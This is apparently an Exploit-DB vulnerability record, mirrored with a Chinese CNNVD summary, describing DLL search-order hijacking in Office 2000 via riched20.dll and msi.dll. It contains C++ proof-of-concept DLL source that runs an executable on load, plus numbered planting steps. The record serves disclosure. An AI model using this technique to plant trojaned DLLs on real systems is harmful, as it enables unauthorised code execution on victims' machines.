https://www.exploit-db.com/exploits/20232
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200011-047

启动MicrosoftOffice2000文件时，其目录首先用于DLL的查找如riched20.dll和msi.dll，攻击者可以通过向相同文件目录插入DLL特洛伊木马的方式执行任意命令。

source: http://www.securityfocus.com/bid/1699/info

When a program executes under Microsoft Windows, it may require additional code stored in DLL library files. These files are dynamically located at run time, and loaded if necessary. A weakness exists in the algorithm used to locate these files.

The search algorithm used to locate DLL files specifies that the current working directory is checked before the System folders. If a trojaned DLL can be inserted into the system in an arbitrary location, and a predictable executable called with the same current working directory, the trojaned DLL may be loaded and executed. This may occur when a data file is accessed through the 'Run' function, or double clicked in Windows Explorer.

This has been reported to occur with the 'riched20.dll' and 'msi.dll' DLL files and some Microsoft Office applications, including WordPad.

This behavior has also been reported for files loaded from UNC shares, or directly from FTP servers. 

// dll1.cpp : Defines the entry point for the DLL application.
//

#include "stdafx.h"
#include "stdlib.h"

BOOL APIENTRY DllMain( HANDLE hModule, 
                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
					 )
{
   switch( ul_reason_for_call ) 
    { 
        case DLL_PROCESS_ATTACH:
         // Initialize once for each new process.
         // Return FALSE to fail DLL load.
			MessageBox(NULL, "Hello world!", "Info", MB_OK);
			MessageBox(NULL, "Shall try to start: C:\TEST.EXEn You may need to create it.", "Info", MB_OK);
			system("C:\TEST.EXE");
            break;

        case DLL_THREAD_ATTACH:
        // Do thread-specific initialization.
		//	MessageBox(NULL, "DllMain.dll: DLL_THREAD_ATTACH", "Info", MB_OK);
            break;

        case DLL_THREAD_DETACH:
         // Do thread-specific cleanup.
            break;

        case DLL_PROCESS_DETACH:
         // Perform any necessary cleanup.
            break;
    }

    return TRUE;
}

1) Rename dll1.dll to riched20.dll
2) Place riched20.dll in a directory of your choice
3) Close all Office applications
4) From Windows Explorer double click on an Office document (preferably MS Word document) in the directory containg riched20.dll

来源:BID
名称:1699
链接:http://www.securityfocus.com/bid/1699
来源:WIN2KSEC
名称:20000918DoubleclickingonMSOfficedocumentsfromWindowsExplorermayexecutearbitraryprogramsinsomecases
链接:http://archives.neohapsis.com/archives/win2ksecadvice/2000-q3/0117.html
来源:XF
名称:office-dll-execution(5263)
链接:http://xforce.iss.net/static/5263.php
来源:NTBUGTRAQ
名称:20000921MitigatorsforpossibleexploitofEudoraviaGuninski#21,2000
链接:http://archives.neohapsis.com/archives/ntbugtraq/2000-q3/0155.html
来源:BUGTRAQ
名称:20000922Eudora+riched20.dllaffectsWinZipv8.0aswell
链接:http://archives.neohapsis.com/archives/bugtraq/2000-09/0277.html